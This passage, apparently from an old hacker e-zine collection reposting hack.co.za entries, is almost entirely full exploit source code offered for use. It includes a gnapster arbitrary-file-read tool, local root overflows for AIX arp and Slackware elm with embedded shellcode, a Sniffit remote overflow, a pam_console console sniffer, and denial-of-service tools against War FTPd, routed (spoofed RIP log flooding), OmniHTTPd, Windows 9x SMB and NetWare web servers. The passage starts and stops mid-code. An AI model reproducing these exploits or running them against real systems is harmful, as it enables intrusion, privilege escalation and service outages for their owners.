if (!dis) close(fd);
}
sock_t tcp_conn (ip_t addr, port_t port)
{
sock_t ret;
struct sockaddr_in sa;
sa.sin_addr.s_addr = addr;
sa.sin_port = htons(port);
sa.sin_family = AF_INET;
if ((ret = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == ERR)
return (ERR);
else if ((connect(ret, (struct sockaddr *)&sa, sizeof(struct
sockaddr_in))) == ERR) return (ERR);
return (ret);
}
ip_t resolve (u_char * host)
{
struct in_addr addr;
struct hostent * hp;
if ((addr.s_addr = inet_addr(host)) == ERR)
{
if (!(hp = gethostbyname(host))) return (ERR);
memcpy(&addr.s_addr, hp->h_addr, hp->h_length);
}
return (addr.s_addr);
}
/* EOF */
/* www.hack.co.za [14 May]*/
@HWA
263.0 [IND] napstir.c remote linux misc exploit by S.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
super@udel.edu
/* napstir by Derek Callaway <super@udel.edu> -- S@IRC *
* Exploits a gnapster bug... (probably exists in other clients, too.)
* Greetings: inNUENdo, s0ftpj, napster
* I discovered some service denial techniques while coding; see below.
*/
#include<stdio.h>
#include<stdlib.h>
#include<errno.h>
#include<string.h>
#include<netdb.h>
#include<netinet/in.h>
#include<sys/socket.h>
#include<unistd.h>
#include<ctype.h>
void vexit(const char *func){perror(func);exit(EXIT_FAILURE);}
int main(int argc,char**argv){
int sock,port,len;
struct hostent *he;
char str[4096],buf[4096],*sln,*op,c;
struct sockaddr_in ta;
if(argc<3){
printf("napstir by S\n");
printf("usage: %s host file [port] [username]\n",argv[0]);
printf("example: %s metallica.com ",argv[0]);
printf("\"\\etc\\passwd\" 6699\n");
printf("default port is 6699\n");
printf("default username is Lamer (usually not required)\n");
exit(EXIT_SUCCESS);
}
if(!(he=gethostbyname(argv[1])))vexit("gethostbyname");
ta.sin_family=AF_INET;
ta.sin_addr=*((struct in_addr*)he->h_addr);
if(argv[3]){
port=strtol(argv[3],(char**)0,10);
if(errno==ERANGE)vexit("strtol");
} else port=6699;
ta.sin_port=htons(port);
memset(&ta.sin_zero,0,sizeof(ta.sin_zero));
if((sock=socket(AF_INET,SOCK_STREAM,0))<0)vexit("socket");
if(connect(sock,(struct sockaddr*)&ta,sizeof(struct sockaddr))<0)
vexit("connect");
/* I wonder what this byte is for. */
recv(sock,&buf,1,0);
/* 9 is the code for T1 bitrate -- Most clients ignore the username
* field.
*/
sprintf(str,"%s \"%s\" 9",(argc>=4)?argv[4]:"Lamer",argv[2]);
send(sock,"GET",3,0);
send(sock,(char*)str,strlen(str),0);
/* * SERVICE DENIAL CODE *
* Uncomment this line if you'd like to crash knapster. :-)
* send(sock,"0",1);
*/
if(!(op=sln=(char*)malloc(1024)))vexit("malloc");
do {
read(sock,&c,1);
sprintf(sln,"%c",c);
sln++;
} while(isdigit(c));
*sln=0;
sln=op;
len=strtol(sln,(char**)0,10);
if(errno==ERANGE)vexit("strtol");
write(STDOUT_FILENO,&c,1);
if((port=read(sock,&buf,len-1))<0)vexit("read");
write(STDOUT_FILENO,buf,port);
exit(EXIT_SUCCESS);
}
/* www.hack.co.za [14 May]*/
@HWA
264.0 [IND] SSG-arp.c aix 4.1 local overflow by cripto.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cripto@subterrain.net
/*
* AIX 4.1.4.0 local root /usr/sbin/arp exploit - SSG-arp.c - 06/06/2000
*
* This code is largely from an old AIX mount exploit by Georgi Guninski.
* Tested on a blazing 33Mhz RS/6000 IBM POWERserver 340!
*
* Shouts to bind, xdr, obecian, qwer7y, interrupt, linda, and ur mom.
*
* -cripto <cripto@subterrain.net> .o0-> SSG ROX 2000 !@#$#@! <-0o.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define OFFSET 3580
char prog[100]="/usr/sbin/arp";
char prog2[30]="arp";
extern int execv();
char *createvar(char *name,char *value)
{
char *retval;
int l;
l = strlen(name) + strlen(value) + 4;
if (! (retval = malloc(l)))
{
perror("malloc");
exit(2);
};
strcpy(retval,name);
strcat(retval,"=");
strcat(retval,value);
putenv(retval);
return retval;
}
main(int argc,char **argv,char **env)
{
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET = 0;
int dobuf = 0;
char VAR[30] = "LC_MESSAGES";
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int egg = 1;
int ch;
unsigned int reta;
int corr = 4604;
char *args[4];
char *newenv[8];
int justframes = 1;
int startwith = 0;
mn = 78;
max = 100;
if (argc > 1)
{
corr = atoi(argv[1]);
}
else
{
corr = OFFSET;
}
pt = (unsigned *) &execv;
toc = *(pt+1);
eco = *pt;
if (((mn + strlen((char*)&code) / 4) > max) || (max > MAXBUF))
{
perror("invalid input");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2) = (unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO) = (unsigned short) ((toc >> 16) &
0x0000ffff);
*((unsigned short *)code + OO + 8 ) = (unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 ) = (unsigned short) ((eco >> 16) &
0x0000ffff);
reta = startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0] + corr;
for(nop = 0;nop < mn;nop++)
buf[nop] = startwith ? reta : 0x4ffffb82;
strcpy((char*)&buf[nop], (char*)&code);
i = nop + strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");
exit(5);
}
while(i++ < max)
buf[i] = reta;
buf[i] = 0;
for(i = 0;i < max-1;i++)
frame[i] = reta;
frame[i] = 0;
if(QUIET)
{
puts((char*)&buf);
fflush(stdout);
exit(0);
};
newenv[0] = createvar("EGGSHEL", (char*)&buf[0]);
newenv[1] = createvar("EGGSHE2", (char*)&buf[0]);
newenv[2] = createvar("EGGSHE3", (char*)&buf[0]);
newenv[3] = createvar("EGGSHE4", (char*)&buf[0]);
newenv[4] = createvar("DISPLAY", getenv("DISPLAY"));
newenv[5] = VAR[0] ? createvar(VAR,justframes ? (char*)&frame :
(char*)&buf):NULL;
newenv[6] = NULL;
args[0] = prog2;
execve(prog,args,newenv);
perror("execve\n");
}
/* www.hack.co.za [10 May]*/
@HWA
265.0 [IND] warftpd.c win95 remote dos attack by eth0.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* coded by eth0 from buffer0verfl0w */
/* tested by morpha */
/* *NOTE* Original exploit was coded for winbl0wz *NOTE */
/*
Vulnerable:
War FTPd version 1.66x4
War FTPd version 1.67-3
Immune:
War FTPd version 1.67-4
War FTPd version 1.71-0
The buffer overflow seems to occur because the bound
check of the command of MKD/CWD is imperfect. This
means that although anyone can overflow the statically
assigned buffer that stores the requested path, you
cannot overwrite the RET address and therefore it's
impossible to cause War FTPd to execute arbitrary code.
However, it is a simple mechanism for performing a Denial
of-Service against the server.
Solution:
War FTPd 1.70-1 does fix this problem, but it contains other
vulnerabilities (see our additional information section).
*/
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define FTP_PORT 21
#define MAXBUF 8182
//#define MAXBUF 553
#define MAXPACKETBUF 32000
#define NOP 0x90
#define PASS "PASS eth0@owns.your.ass.com\r\n"
#define LOGIN "USER anonymous\r\n"
int expl0it(char *host)
{
struct hostent *hp;
struct in_addr addr;
struct sockaddr_in s;
static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
/* u_char buf[280]; */
int p, i;
hp = gethostbyname (host);
if (!hp) exit (1);
bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
s.sin_port = htons (FTP_PORT);
s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
if(connect (p, &s, sizeof (s))!=0)
{
printf("[%s:%s] <-- doesn't seem to be listening\n",host,FTP_PORT);
return;
}
else {
printf("Connected!\n");
write(p, LOGIN, strlen(LOGIN));
write(p, PASS, strlen(PASS));
memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
sprintf((char *)packetbuf,"CWD %s\r\n",buf);
send(p,(char *)packetbuf,strlen((char *)packetbuf),0);
printf("DONE!\n");
}
return(0);
}
int main(int argc, char *argv[])
{
if(argc<2)
{
printf("Usage: %s [host] \n",argv[0]);
return;
}
else
{
expl0it(argv[1]);
}
return(0);
}
/* www.hack.co.za [10 May]*/
@HWA
266.0 [IND] sniffit.c remote linux misc overflow by fusys.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.s0ftpj.org/
/*
* Sniffit 0.3.7beta Linux/x86 Remote Exploit
* ShellCode is a modified version of w00w00 write egg,
* to pass Sniffit input filter
*
* Tested on RedHat 5.2, 6.0, 6.2
* Proof Of Concept Code
*
* credits: |CyraX| for pointing me to the coredump
* del0 for hurrying me :)
* vecna for offering me drinks ;P
* belf for loving and caring his GSM ;P
*
* FuSyS [S0ftpj|BFi]
* http://www.s0ftpj.org/
*/
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#include<netdb.h>
#include<netinet/in.h>
#define LENGTH 600
#define RET RH6x
#define RH52 0xbfff5c10
#define RH6x 0xbfff5bb5 // 0.3.6HIP 0xbfffcc50
#define OFFSET 0
#define ALIGNOP 3 // 3 RH6.0, 4 RH6.2
// may vary [1-5]
/* Note To Script Kiddies: This ShellCode Simply Changes An
Existing /etc/motd So Don't Bother DownLoading */
unsigned char shellcode[]=
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb"
"\x30\xe4\x88\x63\x09\x31\xc9\x66\xb9\x01\x04\x31\xd2\x66\xba\xa4"
"\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x3f\x01\xf9\x31"
"\xd2\xb2\x0e\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f"
"\x65\x74\x63\x2f\x6d\x6f\x74\x64\x01\x66\x75\x73\x79\x73\x20\x77"
"\x61\x73\x20\x68\x65\x72\x65\x0a";
unsigned long nameResolve(char *hostname)
{
struct in_addr addr;
struct hostent *hostEnt;
if((addr.s_addr=inet_addr(hostname)) == -1) {
if(!(hostEnt=gethostbyname(hostname))) {
printf("Name Resolution Error:`%s`\n",hostname);
exit(0);
}
bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
}
return addr.s_addr;
}
int main(int argc,char **argv)
{
char buff[LENGTH+ALIGNOP+1];
char cmd[610];
long addr;
unsigned long sp;
int offset=OFFSET;
int i, x;
int sock;
struct sockaddr_in sin;
if(argc<2) {
fprintf(stderr, "Usage: %s <sniffit host>\n", argv[0]);
exit(0);
}
sp=(unsigned long) RET;
addr=sp-offset;
for(i=0;i<120-ALIGNOP;i++)
buff[i]=0x90;
for(x=0; x<strlen(shellcode); i++, x++)
buff[i]=shellcode[x];
for(i-=1 ; i<LENGTH; i+=4) {
buff[i ] = addr & 0x000000ff;
buff[i+1] = (addr & 0x0000ff00) >> 8;
buff[i+2] = (addr & 0x00ff0000) >> 16;
buff[i+3] = (addr & 0xff000000) >> 24;
}
printf("\nSniffit <=0.3.7beta Linux/x86 Remote Exploit\n");
printf("by FuSyS [S0ftpj|BFi] - http://www.s0ftpj.org\n\n");
memset(&sin,0,sizeof(sin));
sin.sin_family=AF_INET;
sin.sin_port=htons(25);
sin.sin_addr.s_addr=nameResolve(argv[1]);
printf("Connecting to %s ...\n", argv[1]);
if((sock=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Can't create socket\n");
exit(0);
}
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
{
printf("Can't connect to Sniffit Server\n");
exit(0);
}
printf("Injecting ShellCode ...\n");
strncat(cmd, "mail from:", 10);
strncat(cmd, buff, strlen(buff));
write(sock, cmd, strlen(cmd));
printf("Done!\n\n");
return(0);
}
/* www.hack.co.za [10 May]*/
@HWA
267.0 [IND] pam_console.c redhat (6.2/6.1/6.0) local exploit.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
A vulnerability exists in the pam_console PAM module
included as part of any Linux system running PAM.
pam_console exists to own certain devices to users
logging in to the console of a Linux machine.
It is designed to allow only console users to utilize
things such as sound devices. It will chown devices
to users upon logging in, and chown them back to
being owned by root upon logout. However, as certain
devices do not have a 'hangup' mechanism, like a tty
device, it is possible for a local user to continue
to monitor activity on certain devices after logging
out. This could allow an malicious user to sniff
other users console sessions, and potentially obtain
the root password if the root user logs in or a user
su's to root. They could also surreptitiously execute
commands as the user on the console.
Affected:
RedHat Linux 6.2, 6.1, 6.0
*/
#include <sys/fcntl.h>
main(int argc,char*argv[]) {
char buf[80*24];
int f=open(argv[1],O_RDWR);
while (1) {
lseek(f,0,0);
read(f,buf,sizeof(buf));
write(1,"\033[2J\033[H",7); // clear terminal, vt100/linux/ansi
write(1,buf,sizeof(buf));
usleep(10000);
}
}
/* www.hack.co.za [10 May]*/
@HWA
268.0 [IND] routedsex.c slackware 7 remote dos attack by xt.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
brandon@james.kalifornia.com
/*
routedsex.c by xt of XOR (brandon@james.kalifornia.com)
DoS attack against the routed daemon.
description:
i noticed a while back, when i was screwing with routed, that
RIP packets destined for routed (port 520) caused it to log
an 'unknown router' error to the system log. if i flooded
it with the same spoofed IP address, it would just say that
the last message was logged X times. but, if they're randomly
spoofed, it logs each one. so this causes a DoS attack against
the hard drive space of the system. the syslog will eventually
fill up. run this program a couple of times against a host to
make the system log fill up even quicker. here's an excerpt from
the /var/log/syslog file on my system:
... routed[3067]: packet from unknown router, 45.138.23.14
and many, many, many more.. 800K file so far after 40 seconds
of attacking it.
this has been tested on slackware linux 7.0. should work on all
linux, may need a couple of tweaks to compile on some distributions,
such as the ever so crappy RedHat and it's clones (i *HATE* redhat).
anyways, have fun. btw, XOR is looking for more members.. if you're
interested in joining, read http://xorteam.cjb.net.
- xt
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <protocols/routed.h>
#include <linux/route.h>
#include <arpa/inet.h>
/* i think i took this line from a syn flooder.. */
#define ranipbit(a, b) ((rand() % (((b) + 1) - (a))) + (a))
u_short chksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 1;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
int dolphin (int sock, struct sockaddr_in *sin, char *rp, int sizerp, u_long source, u_long victim)
{
struct udphdr udp;
struct iphdr ip;
char packet[8092];
int ret;
ip.id = htons(31337 + (rand() % 100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.ihl = 5;
ip.version = 4;
ip.tos = 0;
ip.tot_len = htons(28 + sizerp);
ip.saddr = source;
ip.daddr = victim;
ip.check = chksum((u_short *) &ip, sizeof(ip));
udp.source = htons(520);
udp.dest = htons(520);
udp.len = htons(8 + sizerp);
udp.check = 0;
memcpy(packet, (char *) &ip, sizeof(ip));
memcpy(packet + sizeof(ip), (char *) &udp, sizeof(udp));
memcpy(packet + sizeof(ip) + sizeof(udp), (char *) rp, sizerp);
ret = sendto(sock, packet, sizeof(ip) + sizeof(udp) + sizerp, 0,
(struct sockaddr *) sin, sizeof(struct sockaddr_in));
return ret;
}
int main(int argc, char **argv)
{
u_long victim, stop = 0, srcaddr, udelay = 100;
int sock, dos = 1, riptype = 1;
struct sockaddr_in sin;
struct rip rp;
struct netinfo *neti = rp.rip_nets;
struct hostent *hp;
if (argc < 4) {
fprintf(stderr, "routesex.c by xt of XOR\n");
fprintf(stderr, "usage: %s <victim> <usleep> <time [put '0' for continuous]>\n", argv[0]);
return 0;
}
udelay = atol(argv[2]);
if (!udelay)
udelay = 100;
stop = atol(argv[3]);
if (!stop)
stop = 0;
else
stop += time(0);
if ((hp = gethostbyname(argv[1])) == NULL) {
perror("gethostbyname");
return -1;
} else
bcopy(*hp->h_addr_list, &victim, sizeof(hp->h_addr_list));
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
perror("socket");
return -1;
}
sin.sin_family = AF_INET;
sin.sin_port = htons(520);
sin.sin_addr.s_addr = victim;
rp.rip_vers = RIPVERSION;
neti->rip_dst.sa_family = htons(AF_INET);
memcpy(rp.rip_nets, neti, sizeof(neti));
printf("RIP'ing %s!\n", argv[1]);
while (dos) {
int a, b, c, d;
char buffer[32];
a = ranipbit(0, 255);
b = ranipbit(0, 255);
c = ranipbit(0, 255);
d = ranipbit(0, 255);
rp.rip_cmd = riptype;
neti->rip_metric = htonl(riptype);
if (riptype == 4)
riptype = 1;
snprintf(buffer, 32, "%d.%d.%d.%d", a, b, c, d);
srcaddr = inet_addr(buffer);
if ((dolphin(sock, &sin, (char *) &rp, sizeof(rp), srcaddr, victim)) == -1) {
perror("sendto");
return -1;
}
riptype++;
usleep(udelay);
if (!stop) {
if (time(0) == stop)
dos = 0;
}
}
printf("Finished.\n");
close(sock);
return 0;
}
/* www.hack.co.za [10 May]*/
@HWA
269.0 [IND] omni-httpd.sh win98 remote dos attack by sirius.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://b0f.freebsd.lublin.pl
#!/bin/sh
#
# Vulnerable versions:
# Omni Httpd pro v.2.06 Win98 (NT not tested)
#
# The problem:
# It is possible to crash remote system because
# OmniHttpD (version: Pro. v2.06, maybe others)
# parse the path strings to call some FAT32/VFAT
# routines in the kernel which makes your system
# unstable and useless until next reboot.
#
# Fix:
# Unknown for now, I mailed Omnicron Technologies
# they will probably fix this bug in next version.
#
# About:
# Discovered by: sirius from b0f
# Coded by: sirius from buffer0vefl0w security (b0f)
# [http://b0f.freebsd.lublin.pl]
if [ "$1" = "" ]; then
echo "OmniHTTPd v.2.06 DoS attack"
echo
echo "Coded: sirius from buffer0vefl0w security (b0f)"
echo "[http://b0f.freebsd.lublin.pl]"
echo
echo "Usage: $0 <host> <port>"
echo
exit 1
fi
echo "Launching attack ... please wait "
# this will crash some devices, but if modem is on comX the code after line with comX will not
# be executed ... you can change the order of execution ;)
(echo "GET /lpt1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /lpt2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com3" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com4" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com5" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
# the following code will crash/freeze/make system busy/how to call it? system
(echo "GET /aux" ; sleep 5) | telnet $1 80 1>/dev/null 2>/dev/null
(echo "GET /con/con" ; sleep 5) |telnet $1 80 1>/dev/null 2>/dev/null
echo "Crash code send ..."
killall -9 telnet 2>/dev/null 1> /dev/null
echo "Done!"
# www.hack.co.za [10 May]#
@HWA
270.0 [IND] RFParalyze.c win(95/98) remote dos attack by rfp.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
rfp@wiretrip.net
/************************* www.el8.org **** www.wiretrip.net */
/* - el8.org advisory: RFParalyze.c
code by rain forest puppy <rfp@wiretrip.net> -
coolness exhibited by Evan Brewer <dm@el8.org> -
- Usage: RFParalyze <IP address> <NetBIOS name>
where <IP address> is the IP address (duh) of the target (note:
not DNS name). <NetBIOS name> is the NetBIOS name (again, duh)
of the server at the IP address given. A kiddie worth his
scripts should be able to figure out how to lookup the NetBIOS
name. Note: NetBIOS name must be in upper case.
This code was made from a reverse-engineer of 'whisper', a
binary-only exploit found in the wild.
I have only tested this code on Linux. Hey, at least it's
not in perl... ;) -rfp
Microsoft Windows 98
Microsoft Windows 95
*/
#include <stdio.h> /* It's such a shame to waste */
#include <stdlib.h> /* this usable space. Instead, */
#include <string.h> /* we'll just make it more */
#include <netdb.h> /* props to the men and women */
#include <sys/socket.h> /* (hi Tabi!) of #!adm and */
#include <sys/types.h> /* #!w00w00, because they rock */
#include <netinet/in.h> /* so much. And we can't forget*/
#include <unistd.h> /* our friends at eEye or */
#include <string.h> /* Attrition. Oh, +hi Sioda. :) */
/* Magic winpopup message
This is from \\Beav\beavis and says "yeh yeh"
Ron and Marty should like the hardcoded values this has ;)
*/
char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";
struct sreq /* little structure of netbios session request */
{
char first[5];
char yoname[32];
char sep[2];
char myname[32];
char end[1];
};
void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/
int main(int argc, char *argv[]){
char buf[4000], myname[33], yoname[33];
struct sockaddr_in sin;
int sox, connex, x;
struct sreq smbreq;
printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");
if (argc < 3) {
printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n");
printf(" --IP must be ip address, not dns\n");
printf(" --NetBIOS name must be in UPPER CASE\n\n");
exit(1);}
printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");
Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */
myname[30]='A'; /* how was Beltaine? :) */
myname[31]='D';
Pad_Name(argv[2],yoname);
yoname[30]='A';
yoname[31]='D';
printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_family = AF_INET;
sin.sin_port = htons(139);
sox = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
perror("Problems connecting: ");
exit(1);}
memset(buf,0,4000);
memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/
memcpy(smbreq.sep,"\x00\x20",2); /*no need to worry about*/
memcpy(smbreq.end,"\x00",1); /*what it does :) */
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yoname,yoname,32);
write(sox,&smbreq,72); /* send initial request */
x=read(sox,buf,4000); /* get their response */
if(x<1){ printf("Problem, didn't get response\n");
exit(1);}
if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");
else {printf("We didn't get back the A-OK, bailing.\n");
exit(1);}
write(sox,&blowup,72); /* send the magic message >:) */
x=read(sox,buf,4000); /* we really don't care, but sure */
close(sox);
printf("done\n");
}
void Pad_Name(char *name1, char *name2)
{ char c, c1, c2;
int i, len;
len = strlen(name1);
for (i = 0; i < 16; i++) {
if (i >= len) {
c1 = 'C'; c2 = 'A'; /* CA is a space */
} else {
c = name1[i];
c1 = (char)((int)c/16 + (int)'A');
c2 = (char)((int)c%16 + (int)'A');
}
name2[i*2] = c1;
name2[i*2+1] = c2;
}
name2[32] = 0; /* Put in the null ...*/
}
/******************** www.el8.org *** www.wiretrip.net */
/* www.hack.co.za [10 May]*/
@HWA
271.0 [IND] www.c novel (4.11/4.1) remote dos attack by venglin.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
venglin@lagoon.freebsd.org.pl
/******************************************************************************
Novell NetWare webservers remote denial of service
<venglin@lagoon.freebsd.org.pl>
*******************************************************************************
Tested on:
- Novell NetWare 4.11 with Novell-HTTP-Server/3.1R1:
Webserver stops responding requests for few minutes.
- Novell NetWare 4.1 with Novell-HTTP-Server/2.51R1:
Whole system crash [page fault?].
*******************************************************************************
Usage:
./www <vulnerable_host> <http_port> <how_many_connections> <string_length>
Example:
./www copernicus.9lo.lublin.pl 80 10 10000
******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/wait.h>
#define GET "GET"
#define PAT1 "/"
#define PAT2 "a/"
#define PAT3 "../"
#define PAT4 "./"
long getip(char *name)
{
struct hostent *hp;
long ip;
if ((ip=inet_addr(name))==-1)
{
if ((hp=gethostbyname(name))==NULL)
{
(void)fprintf(stderr, "gethostbyname failed.\n");
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int main (argc, argv)
int argc;
char **argv;
{
struct sockaddr_in cli;
int sockfd, i, x, len;
char *msg1, *msg2, *msg3, *msg4;
if (argc < 5) {
(void)fprintf(stderr, "usage: %s <host> <port> <connections> <len>\n", argv[0]);
exit(0);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_addr.s_addr=getip(argv[1]);
cli.sin_port = htons(atoi(argv[2]));
len = atoi(argv[4]);
if (len < (sizeof(GET)+1+sizeof(PAT1))) {
(void)fprintf(stderr, "len too small.\n");
exit(1);
}
msg1 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg2 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg3 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg4 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
sprintf(msg1, "%s %s", GET, PAT1);
sprintf(msg2, "%s %s", GET, PAT1);
sprintf(msg3, "%s %s", GET, PAT1);
sprintf(msg4, "%s %s", GET, PAT1);
for(i=0;i<(len/sizeof(PAT1));i++) strcat(msg1, PAT1);
for(i=0;i<(len/sizeof(PAT2));i++) strcat(msg2, PAT2);
for(i=0;i<(len/sizeof(PAT3));i++) strcat(msg3, PAT3);
for(i=0;i<(len/sizeof(PAT4));i++) strcat(msg4, PAT4);
for(i=0;i<(atoi(argv[3]));i++) if (!(x=fork()))
{
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg1, strlen(msg1));
close(sockfd);
free(msg1);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg2, strlen(msg2));
close(sockfd);
free(msg2);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg3, strlen(msg3));
close(sockfd);
free(msg3);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg4, strlen(msg4));
close(sockfd);
free(msg4);
exit(0);
}
waitpid(x,&i,0);
exit(0);
}
@HWA
272.0 [IND] elm-smash.c slackware 4.0 local overflow by Scrippie.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://b0f.freebsd.lublin.pl
/*
Elm Exploit - Scrippie - #Phreak.nl - b0f - http://b0f.freebsd.lublin.pl
This exploit spawns an EGID mail shell on the default Slackware 4 install.
Use as: elm-smash [mail-gid] [offset]
Not that EGID=mail has got any use, but hey, think of it as group
eleviation :)
Take care and till next time!
*/
#include <stdio.h>
#define NUMNOPS 193 // If you change this, you gonna have to change
// the entire sploit ;)
// Shellcode does: setgid(12); execve("/bin/sh");
char shellcode[]="\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76"
"\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68";
// Oh no! Where the fuck is my code on the stack?
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
// Thanx for telling me lad :)
main(int argc, char **argv)
{
int i, offset=-300; // Offset works for my box
